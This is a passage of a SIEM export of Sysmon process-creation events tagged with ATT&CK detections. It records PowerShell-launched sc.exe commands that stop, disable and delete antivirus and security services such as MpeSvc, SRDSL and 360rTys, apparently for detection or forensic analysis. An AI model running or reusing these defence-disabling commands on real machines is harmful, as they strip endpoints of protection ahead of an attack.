Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:02.108"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-00109f241e00}"",""processId"":""2580"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WifiService"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:30.275",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.049 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-00105c211e00} +ProcessId: 3536 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SRDSL +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SRDSL",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.053946700Z"",""eventRecordID"":""2405"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.049\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-00105c211e00}\r\nProcessId: 3536\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SRDSL\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:02.049"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-00105c211e00}"",""processId"":""3536"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SRDSL"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:30.260",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.022 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-001002201e00} +ProcessId: 7068 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config SRDSL Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config SRDSL Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.025114600Z"",""eventRecordID"":""2404"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.022\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-001002201e00}\r\nProcessId: 7068\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config SRDSL Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:02.022"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-001002201e00}"",""processId"":""7068"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config SRDSL Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:30.231",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:01.986 +ProcessGuid: {df9fc3d3-b379-5ecf-0000-0010041e1e00} +ProcessId: 5312 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop MpeSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop MpeSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:01.988817500Z"",""eventRecordID"":""2402"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:01.986\r\nProcessGuid: {df9fc3d3-b379-5ecf-0000-0010041e1e00}\r\nProcessId: 5312\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop MpeSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:01.986"",""processGuid"":""{df9fc3d3-b379-5ecf-0000-0010041e1e00}"",""processId"":""5312"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop MpeSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:30.182",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:01.940 +ProcessGuid: {df9fc3d3-b379-5ecf-0000-0010691b1e00} +ProcessId: 5308 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop IPSECS +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop IPSECS",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:01.943108700Z"",""eventRecordID"":""2399"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:01.940\r\nProcessGuid: {df9fc3d3-b379-5ecf-0000-0010691b1e00}\r\nProcessId: 5308\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop IPSECS\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:01.940"",""processGuid"":""{df9fc3d3-b379-5ecf-0000-0010691b1e00}"",""processId"":""5308"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop IPSECS"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:30.158",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:01.909 +ProcessGuid: {df9fc3d3-b379-5ecf-0000-0010bf191e00} +ProcessId: 300 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete 360rTys +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete 360rTys",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:01.912634600Z"",""eventRecordID"":""2397"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:01.909\r\nProcessGuid: {df9fc3d3-b379-5ecf-0000-0010bf191e00}\r\nProcessId: 300\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete 360rTys\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:01.909"",""processGuid"":""{df9fc3d3-b379-5ecf-0000-0010bf191e00}"",""processId"":""300"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete 360rTys"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:30.139",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:01.895 +ProcessGuid: {df9fc3d3-b379-5ecf-0000-0010f6181e00} +ProcessId: 7740 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop 360rTys +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 360rTys",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:01.898043800Z"",""eventRecordID"":""2396"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:01.895\r\nProcessGuid: {df9fc3d3-b379-5ecf-0000-0010f6181e00}\r\nProcessId: 7740\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop 360rTys\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:01.895"",""processGuid"":""{df9fc3d3-b379-5ecf-0000-0010f6181e00}"",""processId"":""7740"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop 